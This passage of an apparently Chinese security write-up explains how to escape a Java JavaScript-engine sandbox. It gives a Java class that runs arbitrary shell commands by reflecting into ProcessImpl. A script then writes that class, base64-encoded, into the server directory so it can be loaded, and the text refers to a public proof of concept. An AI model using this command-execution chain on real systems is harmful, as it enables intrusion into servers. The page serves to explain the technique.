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
<p blockindex=46>这里JDK1.6和JDK1.8的构造方法存在差异,所以需要小小修改一下</p>
<p blockindex=47>当调用setAccessible的时候会报错</p>
<pre blockindex=48><code class="hljs language-php">sun.org.mozilla.javascript.internal.EcmaError: <span class=hljs-built_in>TypeError</span>: Cannot call method <span class=hljs-string>"setAccessible"</span> of <span class=hljs-literal>null</span>
</code></pre>
<p blockindex=49><img src="data:image/png;base64,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
<p blockindex=50>在js中无法反射调用根据网上的文章我们可以写class文件然后URLClassLoader去加载</p>
<pre blockindex=51><code class="hljs language-java"><span class=hljs-keyword>import</span> java.io.ByteArrayOutputStream;
<span class=hljs-keyword>import</span> java.io.InputStream;
<span class=hljs-keyword>import</span> java.lang.reflect.Method;
<span class=hljs-keyword>import</span> java.util.Map;
<span class=hljs-keyword>public</span> <span class=hljs-class><span class=hljs-keyword>class</span> <span class=hljs-title>Testcmd</span> </span>{
String result = <span class=hljs-string>""</span>;
<span class=hljs-function><span class=hljs-keyword>public</span> <span class=hljs-title>Testcmd</span><span class=hljs-params>(String paramString)</span> <span class=hljs-keyword>throws</span> Exception</span>{
<span class=hljs-keyword>boolean</span> isLinux = <span class=hljs-keyword>true</span>;
String osTyp = System.getProperty(<span class=hljs-string>"os.name"</span>);
<span class=hljs-keyword>if</span> (osTyp != <span class=hljs-keyword>null</span> &amp;amp;&amp;amp; osTyp.toLowerCase().contains(<span class=hljs-string>"win"</span>)) {
isLinux = <span class=hljs-keyword>false</span>;
}
String[] cmds = isLinux ? <span class=hljs-keyword>new</span> String[]{<span class=hljs-string>"bash"</span>, <span class=hljs-string>"-c"</span>, paramString} : <span class=hljs-keyword>new</span> String[]{<span class=hljs-string>"cmd.exe"</span>, <span class=hljs-string>"/c"</span>, paramString};
Class clazz = Class.forName(<span class=hljs-string>"java.lang.ProcessImpl"</span>);
Method method = clazz.getDeclaredMethod(<span class=hljs-string>"start"</span>, String[].class, Map.class,String.class,<span class=hljs-keyword>boolean</span>.class);
method.setAccessible(<span class=hljs-keyword>true</span>);
InputStream ins = ((Process) method.invoke(<span class=hljs-keyword>null</span>,cmds,<span class=hljs-keyword>null</span>,<span class=hljs-keyword>null</span>,<span class=hljs-keyword>true</span>)).getInputStream();
ByteArrayOutputStream bos = <span class=hljs-keyword>new</span> ByteArrayOutputStream();
<span class=hljs-keyword>byte</span>[] bytes = <span class=hljs-keyword>new</span> <span class=hljs-keyword>byte</span>[<span class=hljs-number>1024</span>];
<span class=hljs-keyword>int</span> size;
<span class=hljs-keyword>while</span>((size = ins.read(bytes)) &amp;gt; <span class=hljs-number>0</span>)
bos.write(bytes,<span class=hljs-number>0</span>,size);
ins.close();
<span class=hljs-keyword>this</span>.result = bos.toString();
}
<span class=hljs-keyword>public</span> java.lang.<span class=hljs-function>String <span class=hljs-title>toString</span><span class=hljs-params>()</span> </span>{
<span class=hljs-keyword>return</span> <span class=hljs-keyword>this</span>.result;
}
<span class=hljs-function><span class=hljs-keyword>public</span> <span class=hljs-keyword>static</span> <span class=hljs-keyword>void</span> <span class=hljs-title>main</span><span class=hljs-params>(String[] args)</span> </span>{
}
}
</code></pre>
<p blockindex=52>没有ban掉File类可以将class文件写入到系统中</p>
<pre blockindex=53><code class="hljs language-java"><span class=hljs-keyword>try</span> {
load(<span class=hljs-string>"nashorn:Moziilla_compat.js"</span>);
} <span class=hljs-keyword>catch</span> (e) {
}
importPackage(Packages.java.io);
importPackage(Packages.java.lang);
importPackage(Packages.sun.misc);
<span class=hljs-keyword>var</span> file = <span class=hljs-keyword>new</span> File(<span class=hljs-string>"../server/Testcmd.class"</span>);
<span class=hljs-keyword>var</span> fos = <span class=hljs-keyword>new</span> FileOutputStream(file);
<span class=hljs-keyword>var</span> base64Decoder = <span class=hljs-keyword>new</span> BASE64Decoder();
<span class=hljs-keyword>var</span> decodeContent = base64Decoder.decodeBuffer(<span class=hljs-string>"yv66vgAAADIAkAoAFwBPCABQCQAiAFEIAFIKAFMAVAoACQBVCABWCgAJAFcHAFgIAFkIAFoIAFsIAFwIAF0KABEAXggAXwcAYAcAMQcAYQkAYgBjCgARAGQKAGUAZgcAZwoAYgBoCgBlAGkHAGoKABoAawcAbAoAHABPCgBtAG4KABwAbwoAbQBwCgAcAHEHAHIBAAZyZXN1bHQBABJMamF2YS9sYW5nL1N0cmluZzsBAAY8aW5pdD4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEACUxUZXN0Y21kOwEAC3BhcmFtU3RyaW5nAQAHaXNMaW51eAEAAVoBAAVvc1R5cAEABGNtZHMBABNbTGphdmEvbGFuZy9TdHJpbmc7AQAFY2xhenoBABFMamF2YS9sYW5nL0NsYXNzOwEABm1ldGhvZAEAGkxqYXZhL2xhbmcvcmVmbGVjdC9NZXRob2Q7AQADaW5zAQAVTGphdmEvaW8vSW5wdXRTdHJlYW07AQADYm9zAQAfTGphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtOwEABWJ5dGVzAQACW0IBAARzaXplAQABSQEADVN0YWNrTWFwVGFibGUHAHIHAFgHAGAHAHMHAHQHAGwHADsBAApFeGNlcHRpb25zBwB1AQAIdG9TdHJpbmcBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEABG1haW4BABYoW0xqYXZhL2xhbmcvU3RyaW5nOylWAQAEYXJncwEAClNvdXJjZUZpbGUBACFUZXN0Y21kLmphdmEgZnJvbSBJbnB1dEZpbGVPYmplY3QMACUAdgEAAAwAIwAkAQAHb3MubmFtZQcAdwwAeAB5DAB6AEkBAAN3aW4MAHsAfAEAEGphdmEvbGFuZy9TdHJpbmcBAARiYXNoAQACLWMBAAdjbWQuZXhlAQACL2MBABVqYXZhLmxhbmcuUHJvY2Vzc0ltcGwMAH0AfgEABXN0YXJ0AQAPamF2YS9sYW5nL0NsYXNzAQANamF2YS91dGlsL01hcAcAfwwAgAAzDACBAIIHAHMMAIMAhAEAEGphdmEvbGFuZy9PYmplY3QMAIUAhgwAhwCIAQARamF2YS9sYW5nL1Byb2Nlc3MMAIkAigEAHWphdmEvaW8vQnl0ZUFycmF5T3V0cHV0U3RyZWFtBwB0DACLAIwMAI0AjgwAjwB2DABIAEkBAAdUZXN0Y21kAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kAQATamF2YS9pby9JbnB1dFN0cmVhbQEAE2phdmEvbGFuZy9FeGNlcHRpb24BAAMoKVYBABBqYXZhL2xhbmcvU3lzdGVtAQALZ2V0UHJvcGVydHkBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwEAC3RvTG93ZXJDYXNlAQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoBAAdmb3JOYW1lAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwEAEWphdmEvbGFuZy9Cb29sZWFuAQAEVFlQRQEAEWdldERlY2xhcmVkTWV0aG9kAQBAKExqYXZhL2xhbmcvU3RyaW5nO1tMamF2YS9sYW5nL0NsYXNzOylMamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kOwEADXNldEFjY2Vzc2libGUBAAQoWilWAQAHdmFsdWVPZgEAFihaKUxqYXZhL2xhbmcvQm9vbGVhbjsBAAZpbnZva2UBADkoTGphdmEvbGFuZy9PYmplY3Q7W0xqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsBAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07AQAEcmVhZAEABShbQilJAQAFd3JpdGUBAAcoW0JJSSlWAQAFY2xvc2UAIQAiABcAAAABAAAAIwAkAAAAAwABACUAJgACACcAAAH5AAYACwAAAOIqtwABKhICtQADBD0SBLgABU4txgARLbYABhIHtgAImQAFAz0cmQAYBr0ACVkDEgpTWQQSC1NZBStTpwAVBr0ACVkDEgxTWQQSDVNZBStTOgQSDrgADzoFGQUSEAe9ABFZAxMAElNZBBMAE1NZBRMACVNZBrIAFFO2ABU6BhkGBLYAFhkGAQe9ABdZAxkEU1kEAVNZBQFTWQYEuAAYU7YAGcAAGrYAGzoHuwAcWbcAHToIEQQAvAg6CRkHGQm2AB5ZNgqeABAZCBkJAxUKtgAfp//pGQe2ACAqGQi2ACG1AAOxAAAAAwAoAAAASgASAAAACAAEAAcACgAJAAwACgASAAsAIgAMACQADgBRABAAWAARAH0AEgCDABMAqQAUALIAFQC5ABcAxgAYANMAGgDYABsA4QAcACkAAABwAAsAAADiACoAKwAAAAAA4gAsACQAAQAMANYALQAuAAIAEgDQAC8AJAADAFEAkQAwADEABABYAIoAMgAzAAUAfQBlADQANQAGAKkAOQA2ADcABwCyADAAOAA5AAgAuQApADoAOwAJAMMAHwA8AD0ACgA+AAAAPwAF/wAkAAQHAD8HAEABBwBAAAAYUQcAEv8AaQAKBwA/BwBAAQcAQAcAEgcAQQcAQgcAQwcARAcARQAA/AAZAQBGAAAABAABAEcAAQBIAEkAAQAnAAAALwABAAEAAAAFKrQAA7AAAAACACgAAAAGAAEAAAAeACkAAAAMAAEAAAAFACoAKwAAAAkASgBLAAEAJwAAACsAAAABAAAAAbEAAAACACgAAAAGAAEAAAAiACkAAAAMAAEAAAABAEwAMQAAAAEATQAAAAIATg=="</span>);
fos.write(decodeContent, <span class=hljs-keyword>new</span> Integer(<span class=hljs-number>0</span>), <span class=hljs-keyword>new</span> Integer(decodeContent.length));
fos.close();
</code></pre>
<p blockindex=54>最后就是网上公开的poc了</p>
<p blockindex=55><img src=data:image/png;base64,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